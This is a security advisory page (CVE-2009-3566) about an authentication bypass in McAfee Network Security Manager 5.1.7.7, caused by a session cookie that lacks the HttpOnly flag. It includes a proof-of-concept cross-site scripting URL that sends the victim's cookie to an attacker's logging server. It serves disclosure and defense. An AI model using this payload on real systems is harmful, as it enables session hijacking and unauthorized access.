SecuriTeam - McAfee Security Manager Authentication Bypass and Session Hijacking Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

McAfee Network Security Manager is vulnerable to authentication bypass via HTTP session cookie hijacking. A remote attacker could exploit this vulnerability to hijack an existing session to the Network Security Manager.

Credit:
The information has been provided by Daniel King.
The original article can be found at: http://www.secureworks.com/ctu/advisories/SWRX-2009-002

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* McAfee Network Security Manager version 5.1.7.7

Immune Systems:
* McAfee Network Security Manager version 5.1.11.8.1

When a user loads the login page of the Network Security Manager, the server sets a cookie within the browser before authentication occurs. This cookie is accessible from client-side JavaScript because the HttpOnly flag is not set. An attacker with access to this cookie may gain privileged access to the Network Security Manager without the need to authenticate.

Best practice is to deploy the management console web application on a segmented management network.

The following demonstrates theft of the session identifier. A cross-site scripting vulnerability is leveraged to steal the cookie data. Example URL used in cookie theft: https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57

Because the HttpOnly flag is not set on the cookie, the cookie data is available from client-side JavaScript. The URL above injects a JavaScript image object within an XSS attack. The src method is then invoked on the Image object, and the URL passed to the object contains a URI-encoded version of the cookie data.

This will cause the victim's browser to connect to the URL and attempt to fetch this image. Since the image does not exist, nothing will display on the victim's browser. The attacker's web server access logs will contain the victim s cookie data, including the session identifier. Using the victim's session identifier, the attacker can send a specially-crafted HTTP request to the server that will result in an authentication bypass.

CVE Information:
CVE-2009-3566

	LedgerSMB Multiple Vulnerabilities
	Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability
	Piwik Cookie Unserialize Vulnerability
	Invision Power Board SQL PHP File Inclusion and SQL Injection
	U.S. Defense Information Systems Agency (DISA) Unix Security Readiness Review (SRR) Vulnerability
	DevIL DICOM Buffer Overflow Vulnerability
	Marvell Driver Multiple Information Element Overflows
	HP Data Protector Express and Single Server Edition (SSE) DoS and Code Execution
	HP Color LaserJet Printers Unauthorized Access to Data and DoS
	KDE KDELibs Remote Array Overrun with Arbitrary Code Execution
	Gimp BMP Image Parsing Integer Overflow Vulnerability
	Avast aswRdr.sys Kernel Pool Corruption and Local Privilege Escalation
	WordPress Unrestricted File Upload Arbitrary PHP Code Execution
	Atheros Driver Reserved Frame DoS Vulnerability
	McAfee Security Manager Authentication Bypass and Session Hijacking Vulnerability